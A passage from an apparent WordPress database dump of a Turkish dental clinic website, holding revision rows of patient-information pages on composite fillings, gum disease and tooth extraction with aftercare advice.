olabilir.</li>\r\n</ul>\r\n<strong>Kompozit Dolgu (diş renginde dolgu) nasıl uygulanır?</strong>\r\n\r\nKompozit reçine, içinde silikon dioksit parçacıkları olan bir plastik karışımdır. Diş renginde olduğu için beyaz dolgu olarak tanımlanırlar. 1960`larda yalnızca ön dişlerde kullanıldıkları halde materyalin ileri derecede geliştirilmesiyle çiğneme basınçlarına dayanıklı ve daha az aşınan bir dolgu maddesi olarak arka dişlerde de başarılı olarak uygulanabilmektedirler.\r\n\r\nKompozit dolgular, hazırlanmış kavitelere tabaka tabaka yerleştirilir ve her tabaka özel bir ışık ile sertleştirilir. Bu işlem bitince kompozit dolgular dişe göre şekillendirilir ve düzeltilir. Bütün bu işlemler amalgam dolgu işleminden daha uzun sürer. Ancak amalgamın en az iki katı kadar daha pahalıdır. Kompozit dolguların ağızda kalma süresi de 7-10 yıldır ki bu süre amalgamın ömrüne yakındır. Ancak çok büyük dolgularda durum amalgamın lehinedir.\r\nBu dolguların en büyük avantajları estetik olmalarıdır. Ayrıca bu dolgular dişlere iyice bağlandığı için diş dokularını destekler, kırılmaları ve sıcaklık geçmesini engeller. Kompozitler, yalnızca çürükleri restore etmek için değil, dişlerin rengini ve biçimini değiştirerek kozmetik etkileri için de kullanılabilmektedirler. En önemli dezavantajı işlem sonrası duyarlılıkların olmasıdır. Dolguların renkleri, kahve, çay gibi boyayıcı yiyeceklerle de hafifçe değişebilmektedir.\r\n\r\n<strong>Kompozit restorasyon sonrası nelere dikkat edilmelidir?</strong>\r\n<ul>\r\n 	<li>Kompozitlerde de artık aynı seansta polisaj işlemi yapılabilmektedir. Ancak çok büyük restorasyonlar ya da çok diş için yapılan seri restorasyonlarda hastanın bir defa daha kontrole gitmesi gerekebilir.</li>\r\n 	<li>Bu mateyallerle ön dişlerde çok büyük kayıplar restore edilebilmekte bu nedenle hastalar ısırma işlemi sırasında dikkatli olmalıdır.</li>\r\n 	<li>Özellikle fasial yüzde yapılan uygulamalardan sonra ne kadar iyi polisaj yapılmış olsa da boyayabilen yiyecek ve içecekler dolguların renklerini değiştirebilir.</li>\r\n 	<li>Aşınma nedeni ile restore edilmiş dişlerde daha çok dikkat edilmesi gereken şey çok sert olmayan diş fırçaları kullanmak ve fırçalama yöntemlerinde düzeltmeler yapabilmektir.</li>\r\n</ul>\r\n[/vc_column_text][/vc_column][/vc_row]', 'Diş Çürümesi ve Dolgular', '', 'inherit', 'closed', 'closed', '', '6254-revision-v1', '', '', '2018-07-18 20:44:50', '2018-07-18 17:44:50', '', 6254, 'http://www.ze-dent.com/6254-revision-v1/', 0, 'revision', '', 0),
(6525, 1, '2018-07-18 20:45:39', '2018-07-18 17:45:39', '[vc_row][vc_column][vc_column_text]<strong>Diş eti hastalıklarının sebepleri nelerdir?</strong>\r\nDişeti hastalıklarının temel nedeni bakteri plağı denilen ve dişe sıkıca tutunan, yapışkan saydam bir tabakadır. Plağın bir miligramında 200 ile 500 milyon arasında bakteri bulunur. Bunun yanı sıra aşağıdaki faktörler de dişeti sağlığını ciddi anlamda etkilemektedir:\r\n<ul>\r\n 	<li>Genetik faktörler,</li>\r\n 	<li>Sigara,</li>\r\n 	<li>İlaç kullanımı (doğum kontrol hapları, antidepresanlar, kalp ilaçları vb.),</li>\r\n 	<li>Hormonal değişiklikler (hamilelik, menapoz, mensturasyon vb.)</li>\r\n 	<li>Stres,</li>\r\n 	<li>Diş sıkmak ve gıcırdatmak,</li>\r\n 	<li>Dengesiz beslenme,</li>\r\n 	<li>Diabet-şeker hastalığı,</li>\r\n 	<li>Kötü yapılmış ağız içi işlemler (kuron, köprü ve dolgular)</li>\r\n</ul>\r\n<strong>Dişeti hastalıklarının belirtileri nasıl görülür?</strong>\r\n\r\nErişkinlerde diş kayıplarının %70`inden periodontal hastalıklar sorumludur. Bu hastalıklar erken dönemde teşhis edildiklerinde kolay ve başarılı bir şekilde tedavi edilebilirler. Dişeti hastalıklarının önlenmesi veya tedavisi; doğal dişlerin korunması, daha rahat çiğnemenin ve daha iyi bir sindirimin sağlanması gibi diğer faydaları da beraberinde getirir.\r\n\r\n<strong>Diş eti hastalığının pek çok bulgusu vardır:</strong>\r\n<ul>\r\n 	<li>Diş fırçalama sırasında kanayan diş etleri,</li>\r\n 	<li>Kırmızı, şiş ve hassas diş etleri,</li>\r\n 	<li>Dişlerden kolaylıkla ayrılabilen, uzaklaşan diş etleri,</li>\r\n 	<li>Dişler ve diş etleri arasında iltihabi akıntı,</li>\r\n 	<li>Sallanan veya giderek birbirinden uzaklaşan dişler (dişler arasında aralıkların oluşması veya mevcut aralıkların artması),</li>\r\n 	<li>Diş eti kenarlarında veya dişler arasında, diş taşlarına bağlı olarak oluşan siyah alanlar,</li>\r\n 	<li>Isırma sırasında alt ve üst dişler arasındaki ilişkilerin değişmesi,</li>\r\n 	<li>Bölümlü protez uyumundaki değişiklik, bozulma,</li>\r\n 	<li>Sürekli ağız kokusu ve kötü bir tat hissi.</li>\r\n</ul>\r\n<strong>Diş taşı temizliğinin dişeti hastalıklarını önlemedeki etkisi nedir?</strong>\r\n\r\nPeriodontal hastalıklar diş eti iltihabı ile başlar ve bunun en önemli etkeni diş plağıdır. Diş plağının kalsifiye olması ile diş taşı oluşur. Diş taşı pürüzlü bir yüzeye sahiptir ve üzeri daima kalsifiye olmamış plak ile örtülüdür. Böylece diş taşı, plak için uygun bir yuva oluşturarak iltihabın sürmesine ve şiddetlenmesine neden olur. Diş eti rahatsızlıklarına neden olan bu bakteri plağının, diş fırçalaması ve diş ipi kullanılması ve kimyasal ajanlarla düzenli olarak her gün, dişlerden uzaklaştırılması gerekmektedir. Günlük ağız bakımı diş taşlarının oluşumunu en az seviyede tutmakla beraber tamamen önleyememektedir. Bu nedenle oluşmuş diş taşları mutlaka temizletilmelidir. Bu dişlere zarar verebilecek veya tehlikeli bir işlem değildir. Diş taşının yeniden oluşumu etkin bir ağız bakımı ile engellenebilir.\r\n\r\nDiştaşı temizliği yapıldıktan sonra dişlerde hassasiyet ve bir miktar kanama olabilir, bu durum normaldir. Diş taşı temizliği sonrası yüzey açığa çıkar ve açığa çıkan bu yüzeyde soğuk ve sıcağa karşı duyarlılık oluşur. Bu duyarlılığın 3-4 günde geçmesi beklenir.\r\n\r\n<strong>Dişetlerine yapılan cerrahi müdahale sonrası neler yapılmalıdır?</strong>\r\n\r\nDişeti rahatsızlıklarının ilerlemiş vakalarında cerrahi müdahale gerekebilir. Cerrahi müdahalenin amacı; derin ceplerdeki diştaşlarını ve hastalıklı dokuları ortamda uzaklaştırarak iyileşmenin olabilmesi için kök yüzeylerini düzleştirmek ve diş etlerine kolay temizlenebilmesi için şekil vermektir. Bu cerrahi müdahaleler ertesinde dikkat edilmesi gerekenler şunlardır:\r\n<ul>\r\n 	<li>Cerrahi işlem sonrasında 2 saat hiçbir şey yiyip içmeyiniz.</li>\r\n 	<li>İlk 24 saat içerisinde sıcak yiyecek ve içeceklerden uzak durmanız gerekmektedir. Çiğneme operasyona dahil edilmeyen bölge ile yapılmalıdır. Yumuşak ve ılık yiyecekler uygundur. Asitli meyve suları, alkollü içecekler ve baharatlı yiyeceklerden uzak durulması gerekmektedir. Aksi takdirde ağrıya neden olurlar.</li>\r\n 	<li>Ameliyatı takip eden günlerde sigara içilmemelidir. Diş etini irrite ederek iyileşmeyi tehlikeye atacağından ve ağız içi sıcaklığını arttıracağından cerrahi işlem sonrası sigara içilmemesi gerekir.</li>\r\n 	<li>Ameliyatı takiben 2 hafta süresince, eğer varsa, protezlerin mümkün olduğunca az kullanılması gerekmektedir.</li>\r\n 	<li>Ameliyat yapılan bölgede pat yoksa veya düştüğünde süturlara bakmak için dudak ve yanağın kaldırılmaması gerekmektedir.</li>\r\n 	<li>Ameliyat bölgesine konulan pat sizi rahat ettirmek ve yara bölgesini irritasyondan korumak içindir. Ağrıyı önler, yara iyileşmesini kolaylaştırır ve alışık olduğunuz aktiviteleri rahatlıkla sürdürebilmenizi sağlar. Pat ilk yerleştirildiği birkaç saat içinde rahatsızlık hissi verebilir. Dil veya parmakla patı oynatmayınız. Yerleştirilen pat küçük parçalar halinde kırılırsa panik yapmayınız. Büyük parçalar koparsa veya sizi çok rahatsız ederse doktorunuzu arayınız.</li>\r\n 	<li>Hafif şişlikler olabilir. Operasyon bölgesinin üzerine ilk gün buz torbası hazırlayarak dışarıdan uygulayabilirsiniz. Sık olarak bir çay kaşığı tuz koyduğunuz bir bardak ılık su ile ağzınızı yavaşça çalkalayınız.</li>\r\n 	<li>Operasyon sonrası ilk 4-5 saat içerisinde cerrahi bölgesinden bir miktar sızıntı olabilir. Bu da tükürüğünüze kırmızı renk verecektir. Bu durumda panik yapmayınız ve sızıntı devam ederse temiz bir gazlı bezi rulo haline getirip 20 dakika kadar kanama bölgesine bası yapacak şekilde uygulayabilirsiniz. Daha uzun süreli kanamalar doktorunuz tarafından kontrol altına alınmalıdır.</li>\r\n 	<li>Operasyon sonrası ilk 24 saat içerisinde ürperti ve halsizlik hissi oluşabilir. Bu durum normaldir ve endişeye gerek yoktur. Günlük aktivitelerinize devam edebilirsiniz, ancak aşırı çaba gerektiren sporlar yapılmamalıdır.</li>\r\n 	<li>Ameliyat sonrası iyileşme için doktorunuzun yazdığı reçeteyi uygulayınız. Eğer doktorunuz önermişse antibiyotikleri tarif edilen şekilde kullanınız. Ameliyat sonrası ağrınız olursa ağrı kesici alabilirsiniz. Bu durumda aspirin veya benzeri salisilik asit türevi ilaçlar alınmamalıdır.</li>\r\n 	<li>Ameliyat edilmeyen bölgelere normal fırçalama işlemlerini uygulayabilirsiniz. Ameliyat bölgesindeki dişlerin ise çiğneme yüzeylerini fırçalayınız. Pat uygulanmamışsa o bölgedeki dişleri de fırçalayabilirsiniz. Ancak, diş ipi kullanırken diş eti altına inmeyiniz. Doktorunuz önermişse fırçalama işlemleri sonrası önerilen ağız gargarasını kullanabilirsiniz.</li>\r\n 	<li>Yemek sonrası ağzınızı çalkalayın. Patın üzerini nemli pamukla veya kulak temizleme çubuğu ile silebilirsiniz.</li>\r\n 	<li>Doktorunuzun önerdiği süre (1 hafta veya 10 gün) sonunda dikişlerinizi aldırmak ve kontrol için doktorunuzu arayınız.</li>\r\n</ul>\r\n[/vc_column_text][/vc_column][/vc_row]', 'Dişeti Hastalıkları', '', 'inherit', 'closed', 'closed', '', '6250-revision-v1', '', '', '2018-07-18 20:45:39', '2018-07-18 17:45:39', '', 6250, 'http://www.ze-dent.com/6250-revision-v1/', 0, 'revision', '', 0),
(6526, 1, '2018-07-18 20:48:43', '2018-07-18 17:48:43', '<p>[vc_row][vc_column][vc_column_text]<strong>Dişeti Hastalıkları (Periodontoloji)</strong></p>\n<p>Periodontoloji, dişleri çevreleyen dokular, iltihabi hastalıklar ve bunların tedavisi ile ilgilenen ana bilim dalıdır.</p>\n<p>Toplumda yaygın olarak rastlanan periodontal hastalıkların ilk belirtisi; diş etinde kanamadır. Diş eti; kızarık, şiş ve parlak yüzeylidir. Çoğu zaman bu belirtilere, ağız kokusu, diş etinde kaşınma, kanama hissi ve dişlerde hassasiyet de eşlik eder.<br />\nPeriodontal hastalıklar, toplumda çocukluktan yaşlılığa kadar her yaşta insanı farklı şiddette etkileyebilmektedir. Çoğu zaman hastanın ağrı gibi bir şikayeti olmadığı için belirti vermeden ilerleyebilmektedir. Hastanın şikayeti olduğunda ise sağlam ve çürüksüz dişler, destek dokulardaki kayıplardan dolayı sallanarak kaybedilmektedir.</p>\n<p><strong>Diş eti iltihabı (Periodontisis)</strong></p>\n<p>Periodontitis; diş ve dişi destekleyen dokuların (periodontal ligament, sement, alveol kemiği) yıkımıyla karakterize iltihapsal bir hastalıktır. Diş eti iltihabı, alveol kemiğine (çene kemiği) kadar ilerlemiştir. Periodontitisin temel nedeni; bakteri plağıdır ve mekanik olarak tedavi edilebilir. Ancak genetik, çevresel ve sistematik faktörler de hastalığın oluşmasında etken olabilir. Sistemik faktörler içinde diabet, kalp damar hastalıkları, epilepsi, down sendromu, AIDS ve kan hastalıkları sayılabilir.</p>\n<p><strong>Diş eti hastalıklarının (Periodontal) teşhis ve tedavisi</strong></p>\n<p>Dişhekimleri dişetlerinin genel görünümünden şüphelendikleri zaman ‘periodontal sonda’ adı verilen bir alet ile diş ile dişeti arasındaki dişeti cebinin boyunu ölçerler. Ayrıca dişlerin etrafındaki kemik dokusunu değerlendirmek için röntgen filmler alınabilir. Böylece dişeti hastalıkları teşhis edilir.</p>\n<p>Periodontal tedavinin ana amacı ise umutsuz gibi görünen sağlıksız dişleri ağızda tutmaktır. Hastalığın tipi ve şiddetine göre değişik tedavi yöntemleri uygulanabilir. Bunlar; öncelikle ağız hijyeni eğitimi, diş taşı temizliği, kök yüzeyi düzleştirilmesi, rejeneratif, rekonstrüktif ve mukogingival operasyonlar olarak özetlenebilir. Aynı zamanda yüksek gülme hattı olan bireylerin diş eti estetiğini sağlamak da, periodontal tedavi kapsamındadır. Hastalığın tipi ve şiddeti, hastanın alışkanlıkları, hekimi ile yapacağı işbirliği, ağız hijyeninin standardı, tedavi planlaması ve başarısını doğrudan etkiler.<br />\nPeriodontal tedavi, erken teşhis ile gerekli müdahaleler yapıldığında sonuçları kesin ve hasta memnuniyetinin en yüksek oranda olduğu diş hekimliği hizmetidir. Unutulmamalıdır ki; periodontal olarak sağlıklı olmayan dişlere hiçbir restoratif tedavi uygulanamaz.[/vc_column_text][/vc_column][/vc_row]</p>\n', 'Dişeti Hastalıkları Periodontoloji', '', 'inherit', 'closed', 'closed', '', '6406-autosave-v1', '', '', '2018-07-18 20:48:43', '2018-07-18 17:48:43', '', 6406, 'http://www.ze-dent.com/6406-autosave-v1/', 0, 'revision', '', 0),
(6527, 1, '2018-07-18 20:57:58', '2018-07-18 17:57:58', '[vc_row][vc_column][vc_column_text]<strong>Dişeti Hastalıkları (Periodontoloji)</strong>\r\n\r\nPeriodontoloji, dişleri çevreleyen dokular, iltihabi hastalıklar ve bunların tedavisi ile ilgilenen ana bilim dalıdır.\r\n\r\nToplumda yaygın olarak rastlanan periodontal hastalıkların ilk belirtisi; diş etinde kanamadır. Diş eti; kızarık, şiş ve parlak yüzeylidir. Çoğu zaman bu belirtilere, ağız kokusu, diş etinde kaşınma, kanama hissi ve dişlerde hassasiyet de eşlik eder.\r\nPeriodontal hastalıklar, toplumda çocukluktan yaşlılığa kadar her yaşta insanı farklı şiddette etkileyebilmektedir. Çoğu zaman hastanın ağrı gibi bir şikayeti olmadığı için belirti vermeden ilerleyebilmektedir. Hastanın şikayeti olduğunda ise sağlam ve çürüksüz dişler, destek dokulardaki kayıplardan dolayı sallanarak kaybedilmektedir.\r\n\r\n<strong>Diş eti iltihabı (Periodontisis)</strong>\r\n\r\nPeriodontitis; diş ve dişi destekleyen dokuların (periodontal ligament, sement, alveol kemiği) yıkımıyla karakterize iltihapsal bir hastalıktır. Diş eti iltihabı, alveol kemiğine (çene kemiği) kadar ilerlemiştir. Periodontitisin temel nedeni; bakteri plağıdır ve mekanik olarak tedavi edilebilir. Ancak genetik, çevresel ve sistematik faktörler de hastalığın oluşmasında etken olabilir. Sistemik faktörler içinde diabet, kalp damar hastalıkları, epilepsi, down sendromu, AIDS ve kan hastalıkları sayılabilir.\r\n\r\n<strong>Diş eti hastalıklarının (Periodontal) teşhis ve tedavisi</strong>\r\n\r\nDişhekimleri dişetlerinin genel görünümünden şüphelendikleri zaman ‘periodontal sonda’ adı verilen bir alet ile diş ile dişeti arasındaki dişeti cebinin boyunu ölçerler. Ayrıca dişlerin etrafındaki kemik dokusunu değerlendirmek için röntgen filmler alınabilir. Böylece dişeti hastalıkları teşhis edilir.\r\n\r\nPeriodontal tedavinin ana amacı ise umutsuz gibi görünen sağlıksız dişleri ağızda tutmaktır. Hastalığın tipi ve şiddetine göre değişik tedavi yöntemleri uygulanabilir. Bunlar; öncelikle ağız hijyeni eğitimi, diş taşı temizliği, kök yüzeyi düzleştirilmesi, rejeneratif, rekonstrüktif ve mukogingival operasyonlar olarak özetlenebilir. Aynı zamanda yüksek gülme hattı olan bireylerin diş eti estetiğini sağlamak da, periodontal tedavi kapsamındadır. Hastalığın tipi ve şiddeti, hastanın alışkanlıkları, hekimi ile yapacağı işbirliği, ağız hijyeninin standardı, tedavi planlaması ve başarısını doğrudan etkiler.\r\nPeriodontal tedavi, erken teşhis ile gerekli müdahaleler yapıldığında sonuçları kesin ve hasta memnuniyetinin en yüksek oranda olduğu diş hekimliği hizmetidir. Unutulmamalıdır ki; periodontal olarak sağlıklı olmayan dişlere hiçbir restoratif tedavi uygulanamaz.[/vc_column_text][/vc_column][/vc_row]', 'Dişeti Hastalıkları Periodontoloji', '', 'inherit', 'closed', 'closed', '', '6406-revision-v1', '', '', '2018-07-18 20:57:58', '2018-07-18 17:57:58', '', 6406, 'http://www.ze-dent.com/6406-revision-v1/', 0, 'revision', '', 0),
(6528, 1, '2018-07-18 20:58:53', '2018-07-18 17:58:53', '[vc_row][vc_column][vc_column_text]<strong>Diş Çekimi</strong>\r\n\r\nGünümüzde, bilimsel/teknolojik ilerlemenin diş hekimliği bilimine katkıları sayesinde, öncelikle dişi tedavi etmek ve ağızda tutmak hedeflenmektedir. Ancak bazen hasta sağlığını koruma veya tedavi planlaması nedeniyle diş çekimine başvurulmaktadır. Bu durumları şöyle sıralayabiliriz:\r\n<ul>\r\n 	<li>İleri derecede çürük ve madde kaybı yüzünden tedaviyle kurtarılamayan dişler,</li>\r\n 	<li>Çarpma sonucu, tedavisi mümkün olmayacak şekilde kırılan dişler,</li>\r\n 	<li>Kanal tedavisine rağmen kurtarılamayan apseli dişler,</li>\r\n 	<li>İleri derecede dişeti iltihabı nedeniyle sallanan dişler,</li>\r\n 	<li>Zamanında düşmeyen süt dişler,</li>\r\n 	<li>Aşırı konum değişikliği (dönme, devrilme vb.) nedeniyle sorun yaratan dişler,</li>\r\n 	<li>Kist ya da tümör içindeki dişler,</li>\r\n 	<li>Tam sürememiş (gömük) ve sorun yaratan dişler…</li>\r\n</ul>\r\nAyrıca ortodontik tedaviye yardımcı olmak amacıyla, yer darlığı nedeniyle sorunsuz olduğu halde bazı dişler çekilebilir.\r\n\r\n<strong>Diş çekimi-kuvvet ilişkisi</strong>\r\n\r\nÇekim sırasında elbette bir kuvvet uygulanır. Ancak çekim aletleri zaten hekimin uyguladığı kuvveti birkaç katına çıkaracak şekilde tasarlandığından, aşırı kuvvet olumsuz sonuçlar bile doğurabilir. Dolayısıyla diş çekimi daha ziyade, teknik bilgi ve beceri gerektiren bir girişimdir. Birçok çene cerrahının bayan olduğu unutulmamalıdır.\r\n\r\n<strong>Diş çekimi korkusunu yenmenin yolları</strong>\r\n\r\nDiş çekimi korkusunun hiçbir şekilde giderilemeyeceğinin anlaşıldığı özel durumlarda, genel anestezi altında çekim yapılabilir. Ancak çoğunlukla hasta ile hekim arasındaki diyalog ve yaklaşım böyle bir girişimin gerekmediğini göstermektedir. Öncelikle çekilmesi gereken dişin vücuda verdiği zararlar ve ağrı gibi olumsuzluklar göz önüne alınarak, bundan kurtulmak gerektiği hatırlanmalıdır. İyi bir uyuşma sağlandıktan sonra, çekim sırasında, sadece bir basınç hissi ve dişin yükselmesi sırasında küçük çıtırtılar duyulabilir. Ağrı ya da acı olmaması gerekir. Genellikle insanlar çevrelerindekileri korkutmayı severler ve bu basınç ile çıtırtıları abartarak anlatırlar. Bu tür yanlış telkinlerin etkisinde kalınmamalı, her türlü soru hekime yöneltilmelidir.\r\n\r\n<strong>Diş Çekimi Sırasında Oluşabilecek Komplikasyon Sebepleri</strong>\r\n<ul>\r\n 	<li>Özellikle büyük azılarda yani çok köklü dişlerde, kökler çok ayrık ya da kıvrık olduğunda,</li>\r\n 	<li>Kemiğin elastikiyetini kaybettiği yaşlı kişilerde,</li>\r\n 	<li>Yine esnemeyen çok kalın çene kemiğine sahip olan kimselerde,</li>\r\n 	<li>Aşırı madde kaybı nedeniyle tutacak yeri azalmış ve kırılganlaşmış dişlerde çekim sırasında kırılma olabilir.\r\nBu korkulacak bir durum değildir. Anestezi, yani uyuşma başarıyla sağlanmışsa, diş hekimi bu iş için üretilmiş aletlerle, kalan parçaları acısız bir şekilde çıkartır.</li>\r\n</ul>\r\n<strong>Diş çekiminden sonra dikkat edilmesi gerekenler</strong>\r\n<ul>\r\n 	<li>Çekim yarasının üzerine konan tampon yarım saat kadar tutulmalıdır.</li>\r\n 	<li>Bu tampon atıldıktan sonra, gerekmiyorsa tekrar tampon konmamalı, oluşan pıhtının bozulmamasına özen gösterilmelidir.</li>\r\n 	<li>Ağız suyla çalkalanmamalıdır.</li>\r\n 	<li>Çekim sonrası iki saat kadar bir şey yenmemeli, bu süre dolduktan sonra da mutlaka ılık şeyler tercih edilmeli, çok sıcak ya da soğuk yiyeceklerden uzak durulmalıdır.</li>\r\n 	<li>24 saat sigara içilmemelidir. Sigara pıhtının bozulmasına ve yara yerinin iltihaplanmasına neden olabilir. ‘Kuru soket’ denen bu durum uzun süre ağrıya sebep olur.</li>\r\n 	<li>24 saat alkol alınmamalıdır.</li>\r\n 	<li>Hiçbir şekilde çekim yerine dokunulmamalı, yara bölgesi emilip tükürülmemelidir.</li>\r\n 	<li>Yaralı bölge 24 saat kullanılmamalıdır.</li>\r\n 	<li>Ağrı olursa aspirin dışında bir ilaç tercih edilmeli, mümkünse bunun için hekime danışılmalıdır.</li>\r\n 	<li>Çekim yeri mutlaka temiz tutulmalıdır. Yara içerisine yemek artığı dolması önlenmelidir.</li>\r\n 	<li>Çekimden 24 saat sonra, yumuşak bir diş fırçasıyla bölge yavaşça fırçalanmalıdır. Bu sırada ılık tuzlu su gargarasından faydalanılabilir.</li>\r\n 	<li>Kanamanın hafif bir sızıntı halinde 6-24 saat sürmesi normal kabul edilmektedir. Ancak aşırı bir kanama varsa ya da bu süre aşılmışsa mutlaka diş hekimine başvurulması gerekmektedir.</li>\r\n 	<li>Aynı şekilde, uzun süren ağrı veya şişlik durumlarında da hekime haber verilmelidir.</li>\r\n</ul>\r\n<strong>Yara iyileştikten sonra yapılması gerekenler</strong>\r\n\r\nÇekim boşluğunun yerine, duruma göre, köprü, protez ya da implant uygulanmalıdır. Çünkü diş eksikliği sindirim bozukluklarına yol açabileceği gibi, çekilen dişe komşu olan dişlerde konum bozuklukları (eğilme, devrilme vb.) ve buna bağlı olarak çiğneme sorunları oluşabilmektedir.\r\n\r\n<strong>Gömük diş</strong>\r\n\r\nDiş etrafındaki çene kemiğinin çok yoğun veya dişetinin çok kalın olduğu durumlarda, çene kavsinin dar olması nedeniyle dişin sürecek yer bulamaması halinde, süt dişlerinin erken kaybı sonucunda ya da bazı hastalıklara bağlı olarak dişetinin altında, kemik içinde kalmış dişlere ‘gömük diş’ denir. Bu dişler apseye neden oluyorsa, ağrı yapıyorsa, tümör ya da kist ile birlikteyse ve komşu dişin çürümesine yol açıyorsa, ayrıca dişin büyüklüğü ve konumu çene kırığı riski taşıyacak kadar kemiğin incelmesine neden oluyorsa çekilmesi gerekir.[/vc_column_text][/vc_column][/vc_row]', 'Diş Çekimi', '', 'inherit', 'closed', 'closed', '', '6400-revision-v1', '', '', '2018-07-18 20:58:53', '2018-07-18 17:58:53', '', 6400, 'http://www.ze-dent.com/6400-revision-v1/', 0, 'revision', '', 0),
(6529, 1, '2018-07-18 20:59:57', '2018-07-18 17:59:57', '[vc_row][vc_column][vc_column_text]<strong>Diş Çekimi</strong>\r\n\r\nGünümüzde, bilimsel/teknolojik ilerlemenin diş hekimliği bilimine katkıları sayesinde, öncelikle dişi tedavi etmek ve ağızda tutmak hedeflenmektedir. Ancak bazen hasta sağlığını koruma veya tedavi planlaması nedeniyle diş çekimine başvurulmaktadır. Bu durumları şöyle sıralayabiliriz:\r\n<ul>\r\n 	<li>İleri derecede çürük ve madde kaybı yüzünden tedaviyle kurtarılamayan dişler,</li>\r\n 	<li>Çarpma sonucu, tedavisi mümkün olmayacak şekilde kırılan dişler,</li>\r\n 	<li>Kanal tedavisine rağmen kurtarılamayan apseli dişler,</li>\r\n 	<li>İleri derecede dişeti iltihabı nedeniyle sallanan dişler,</li>\r\n 	<li>Zamanında düşmeyen süt dişler,</li>\r\n 	<li>Aşırı konum değişikliği (dönme, devrilme vb.) nedeniyle sorun yaratan dişler,</li>\r\n 	<li>Kist ya da tümör içindeki dişler,</li>\r\n 	<li>Tam sürememiş (gömülü) ve sorun yaratan dişler…</li>\r\n</ul>\r\nAyrıca ortodontik tedaviye yardımcı olmak amacıyla, yer darlığı nedeniyle sorunsuz olduğu halde bazı dişler çekilebilir.\r\n\r\n<strong>Diş çekimi-kuvvet ilişkisi</strong>\r\n\r\nÇekim sırasında elbette bir kuvvet uygulanır. Ancak çekim aletleri zaten hekimin uyguladığı kuvveti birkaç katına çıkaracak şekilde tasarlandığından, aşırı kuvvet olumsuz sonuçlar bile doğurabilir. Dolayısıyla diş çekimi daha ziyade, teknik bilgi ve beceri gerektiren bir girişimdir. Birçok çene cerrahının bayan olduğu unutulmamalıdır.\r\n\r\n<strong>Diş çekimi korkusunu yenmenin yolları</strong>\r\n\r\nDiş çekimi korkusunun hiçbir şekilde giderilemeyeceğinin anlaşıldığı özel durumlarda, genel anestezi altında çekim yapılabilir. Ancak çoğunlukla hasta ile hekim arasındaki diyalog ve yaklaşım böyle bir girişimin gerekmediğini göstermektedir. Öncelikle çekilmesi gereken dişin vücuda verdiği zararlar ve ağrı gibi olumsuzluklar göz önüne alınarak, bundan kurtulmak gerektiği hatırlanmalıdır. İyi bir uyuşma sağlandıktan sonra, çekim sırasında, sadece bir basınç hissi ve dişin yükselmesi sırasında küçük çıtırtılar duyulabilir. Ağrı ya da acı olmaması gerekir. Genellikle insanlar çevrelerindekileri korkutmayı severler ve bu basınç ile çıtırtıları abartarak anlatırlar. Bu tür yanlış telkinlerin etkisinde kalınmamalı, her türlü soru hekime yöneltilmelidir.\r\n\r\n<strong>Diş Çekimi Sırasında Oluşabilecek Komplikasyon Sebepleri</strong>\r\n<ul>\r\n 	<li>Özellikle büyük azılarda yani çok köklü dişlerde, kökler çok ayrık ya da kıvrık olduğunda,</li>\r\n 	<li>Kemiğin elastikiyetini kaybettiği yaşlı kişilerde,</li>\r\n 	<li>Yine esnemeyen çok kalın çene kemiğine sahip olan kimselerde,</li>\r\n 	<li>Aşırı madde kaybı nedeniyle tutacak yeri azalmış ve kırılganlaşmış dişlerde çekim sırasında kırılma olabilir.\r\nBu korkulacak bir durum değildir. Anestezi, yani uyuşma başarıyla sağlanmışsa, diş hekimi bu iş için üretilmiş aletlerle, kalan parçaları acısız bir şekilde çıkartır.</li>\r\n</ul>\r\n<strong>Diş çekiminden sonra dikkat edilmesi gerekenler</strong>\r\n<ul>\r\n 	<li>Çekim yarasının üzerine konan tampon yarım saat kadar tutulmalıdır.</li>\r\n 	<li>Bu tampon atıldıktan sonra, gerekmiyorsa tekrar tampon konmamalı, oluşan pıhtının bozulmamasına özen gösterilmelidir.</li>\r\n 	<li>Ağız suyla çalkalanmamalıdır.</li>\r\n 	<li>Çekim sonrası iki saat kadar bir şey yenmemeli, bu süre dolduktan sonra da mutlaka ılık şeyler tercih edilmeli, çok sıcak ya da soğuk yiyeceklerden uzak durulmalıdır.</li>\r\n 	<li>24 saat sigara içilmemelidir. Sigara pıhtının bozulmasına ve yara yerinin iltihaplanmasına neden olabilir. ‘Kuru soket’ denen bu durum uzun süre ağrıya sebep olur.</li>\r\n 	<li>24 saat alkol alınmamalıdır.</li>\r\n 	<li>Hiçbir şekilde çekim yerine dokunulmamalı, yara bölgesi emilip tükürülmemelidir.</li>\r\n 	<li>Yaralı bölge 24 saat kullanılmamalıdır.</li>\r\n 	<li>Ağrı olursa aspirin dışında bir ilaç tercih edilmeli, mümkünse bunun için hekime danışılmalıdır.</li>\r\n 	<li>Çekim yeri mutlaka temiz tutulmalıdır. Yara içerisine yemek artığı dolması önlenmelidir.</li>\r\n 	<li>Çekimden 24 saat sonra, yumuşak bir diş fırçasıyla bölge yavaşça fırçalanmalıdır. Bu sırada ılık tuzlu su gargarasından faydalanılabilir.</li>\r\n 	<li>Kanamanın hafif bir sızıntı halinde 6-24 saat sürmesi normal kabul edilmektedir. Ancak aşırı bir kanama varsa ya da bu süre aşılmışsa mutlaka diş hekimine başvurulması gerekmektedir.</li>\r\n 	<li>Aynı şekilde, uzun süren ağrı veya şişlik durumlarında da hekime haber verilmelidir.</li>\r\n</ul>\r\n<strong>Yara iyileştikten sonra yapılması gerekenler</strong>\r\n\r\nÇekim boşluğunun yerine, duruma göre, köprü, protez ya da implant uygulanmalıdır. Çünkü diş eksikliği sindirim bozukluklarına yol açabileceği gibi, çekilen dişe komşu olan dişlerde konum bozuklukları (eğilme, devrilme vb.) ve buna bağlı olarak çiğneme sorunları oluşabilmektedir.\r\n\r\n<strong>Gömülü diş</strong>\r\n\r\nDiş etrafındaki çene kemiğinin çok yoğun veya dişetinin çok kalın olduğu durumlarda, çene kavsinin dar olması nedeniyle dişin sürecek yer bulamaması halinde, süt dişlerinin erken kaybı sonucunda ya da bazı hastalıklara bağlı olarak dişetinin altında, kemik içinde kalmış dişlere ‘gömülü diş’ denir. Bu dişler apseye neden oluyorsa, ağrı yapıyorsa, tümör ya da kist ile birlikteyse ve komşu dişin çürümesine yol açıyorsa, ayrıca dişin büyüklüğü ve konumu çene kırığı riski taşıyacak kadar kemiğin incelmesine neden oluyorsa çekilmesi gerekir.[/vc_column_text][/vc_column][/vc_row]', 'Diş Çekimi', '', 'inherit', 'closed', 'closed', '', '6400-revision-v1', '', '', '2018-07-18 20:59:57', '2018-07-18 17:59:57', '', 6400, 'http://www.ze-dent.com/6400-revision-v1/', 0, 'revision', '', 0),
